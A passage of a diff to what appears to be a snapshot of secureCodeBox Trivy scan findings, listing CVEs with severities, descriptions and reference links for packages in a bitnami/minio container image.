"https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2023-29491", - "https://www.openwall.com/lists/oss-security/2023/04/12/5", - "https://www.openwall.com/lists/oss-security/2023/04/13/4", - ], - }, - "category": "Vulnerability", - "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Local users can trigger security-relevant memory corruption via malformed data", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29491", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "value": "https://support.apple.com/kb/HT211931", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29491", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "value": "https://www.pcre.org/original/changelog.txt", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36084", + "installedVersion": "3.1-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36084", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "https://linux.oracle.com/cve/CVE-2021-36084.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36084", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "libsepol: use-after-free in __cil_verify_classperms()", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "value": "https://avd.aquasec.com/nvd/cve-2021-36084", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", + "value": "https://access.redhat.com/security/cve/CVE-2021-36084", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", + }, + { + "type": "URL", + "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + }, + { + "type": "URL", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", }, ], - "severity": "HIGH", + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36085", + "installedVersion": "3.1-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36085", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "https://linux.oracle.com/cve/CVE-2021-36085.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36085", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "libsepol: use-after-free in __cil_verify_classperms()", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-36085", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", + }, + { + "type": "URL", + "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + }, + { + "type": "URL", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36086", + "installedVersion": "3.1-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36086", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "https://linux.oracle.com/cve/CVE-2021-36086.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36086", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "use-after-free in cil_reset_classpermission()", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-36086", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", + }, + { + "type": "URL", + "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + }, + { + "type": "URL", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36087", + "installedVersion": "3.1-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36087", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "https://linux.oracle.com/cve/CVE-2021-36087.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36087", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-36087", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", + }, + { + "type": "URL", + "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + }, + { + "type": "URL", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libsmartcols1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + }, + { + "type": "URL", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + }, + { + "type": "URL", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + }, + ], + "severity": "LOW", }, { "attributes": { @@ -66403,7 +67193,7 @@ commonly used by applications.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-4450", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", "https://access.redhat.com/security/cve/CVE-2022-4450", @@ -66656,7 +67446,7 @@ commonly used by applications.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0215", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", "https://access.redhat.com/security/cve/CVE-2023-0215", @@ -66712,7 +67502,8 @@ commonly used by applications.", ], }, "category": "Vulnerability", - "description": "The public API function BIO_new_NDEF is a helper function used for streaming + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by end user applications. @@ -66743,7 +67534,8 @@ The OpenSSL cms and smime command line applications are similarly affected. -", +" +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "use-after-free following BIO_new_NDEF", @@ -66965,7 +67757,7 @@ The OpenSSL cms and smime command line applications are similarly affected. "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0286", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", "https://access.redhat.com/security/cve/CVE-2023-0286", @@ -67253,7 +68045,7 @@ The OpenSSL cms and smime command line applications are similarly affected. "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0464", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/security/cve/CVE-2023-0464", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", @@ -67261,6 +68053,8 @@ The OpenSSL cms and smime command line applications are similarly affected. "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://linux.oracle.com/cve/CVE-2023-0464.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", "https://ubuntu.com/security/notices/USN-6039-1", @@ -67270,7 +68064,8 @@ The OpenSSL cms and smime command line applications are similarly affected. ], }, "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions + "description": +"A security vulnerability has been identified in all supported versions of OpenSSL related to the verification of X.509 certificate chains that include policy constraints. Attackers may be able to exploit this @@ -67280,7 +68075,8 @@ exponential use of computational resources, leading to a denial-of-service Policy processing is disabled by default but can be enabled by passing the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", +\`X509_VERIFY_PARAM_set1_policies()' function." +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", @@ -67313,6 +68109,14 @@ the \`-policy' argument to the command line utilities or by calling the "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -67346,7 +68150,7 @@ the \`-policy' argument to the command line utilities or by calling the "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-2650", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "http://www.openwall.com/lists/oss-security/2023/05/30/1", "https://access.redhat.com/security/cve/CVE-2023-2650", @@ -67355,17 +68159,21 @@ the \`-policy' argument to the command line utilities or by calling the "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://linux.oracle.com/cve/CVE-2023-2650.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", "https://ubuntu.com/security/notices/USN-6119-1", + "https://ubuntu.com/security/notices/USN-6188-1", "https://www.cve.org/CVERecord?id=CVE-2023-2650", "https://www.debian.org/security/2023/dsa-5417", "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or data containing them may be very slow. Impact summary: Applications that use OBJ_obj2txt() directly, or use any of @@ -67413,7 +68221,8 @@ In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, such as X.509 certificates. This is assumed to not happen in such a way that it would cause a Denial of Service, so these versions are considered not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", +and the severity is therefore considered low." +, "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "Possible DoS translating ASN.1 object identifiers", @@ -67450,6 +68259,14 @@ and the severity is therefore considered low.", "type": "URL", "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2023-2650.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + }, { "type": "URL", "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", @@ -67466,6 +68283,10 @@ and the severity is therefore considered low.", "type": "URL", "value": "https://ubuntu.com/security/notices/USN-6119-1", }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6188-1", + }, { "type": "URL", "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", @@ -67487,7 +68308,7 @@ and the severity is therefore considered low.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-2097", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2022:6224", "https://access.redhat.com/security/cve/CVE-2022-2097", @@ -67685,7 +68506,7 @@ and the severity is therefore considered low.", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-4304", "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "openssl", + "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", "https://access.redhat.com/security/cve/CVE-2022-4304", @@ -67928,7 +68749,7 @@ and the severity is therefore considered low.", "foundIn": "Target: 